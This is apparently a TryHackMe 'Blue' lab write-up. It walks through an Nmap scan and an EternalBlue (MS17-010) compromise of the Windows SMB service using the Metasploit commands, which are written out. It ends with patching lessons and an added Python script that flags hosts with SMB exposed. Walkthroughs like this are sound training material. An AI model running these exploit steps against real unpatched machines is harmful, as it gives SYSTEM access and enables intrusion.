TryHackMe — Blue

Overview

Blue is an introductory TryHackMe machine that covers the infamous EternalBlue (MS17-010) vulnerability in Windows SMB.

Reconnaissance

We begin with a standard Nmap scan to identify open ports and services.

nmap -sC -sV -oN nmap/blue 10.10.x.x

Key findings:

  • Port 135 — MSRPC
  • Port 139 — NetBIOS
  • Port 445 — SMB (vulnerable)

Exploitation

The machine is vulnerable to MS17-010 (EternalBlue). We use Metasploit to exploit it.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
run

Privilege Escalation

EternalBlue gives us SYSTEM-level access directly — no further escalation needed.

Flags

Flag    Location
User    C:\Users\jon\Desktop\flag.txt
Root    C:\Windows\System32\config\flag.txt

Lessons Learned

  • Always patch SMB vulnerabilities
  • EternalBlue remains one of the most critical Windows exploits in history
  • Metasploit simplifies exploitation but understanding the underlying vulnerability is key
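
To act on the first lesson, the report format written by the Nmap command in the Reconnaissance step can be parsed to list which scanned hosts still have SMB reachable and therefore need their MS17-010 patch status confirmed. This is an added example, not part of the original write-up; the report text, the 192.0.2.x addresses, the hostname and the function name smb_exposure are constructed for illustration.

```python
import re

# Constructed sample in the layout written by `nmap -sC -sV -oN` (placeholder addresses).
SAMPLE_REPORT = """\
Nmap scan report for 192.0.2.10
Host is up (0.045s latency).
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

Nmap scan report for files.example.test (192.0.2.20)
Host is up (0.051s latency).
PORT    STATE    SERVICE      VERSION
22/tcp  open     ssh          OpenSSH 8.9
445/tcp filtered microsoft-ds

Nmap scan report for 192.0.2.30
Host is up (0.048s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx
"""

# Header is either "for <ip>" or "for <hostname> (<ip>)"; capture the address.
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
SMB_PORTS = {139, 445}  # the NetBIOS and SMB ports from the key findings


def smb_exposure(report: str) -> dict[str, list[int]]:
    """Map each scanned host to the SMB ports nmap reported as open."""
    exposed: dict[str, list[int]] = {}
    host = None
    for line in report.splitlines():
        m = HOST_RE.match(line.strip())
        if m:
            host = m.group(1)
            exposed[host] = []  # hosts with no open SMB port keep an empty list
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            port, proto, state = int(m.group(1)), m.group(2), m.group(3)
            # "filtered" and "closed" are not counted as exposure
            if proto == "tcp" and state == "open" and port in SMB_PORTS:
                exposed[host].append(port)
    return exposed

if __name__ == "__main__":
    for host, ports in smb_exposure(SAMPLE_REPORT).items():
        status = f"SMB open on {ports}: confirm MS17-010 patch" if ports else "no open SMB port"
        print(f"{host}: {status}")
```

An open port only shows that SMB is reachable; whether the host is actually patched still has to be confirmed against its installed updates.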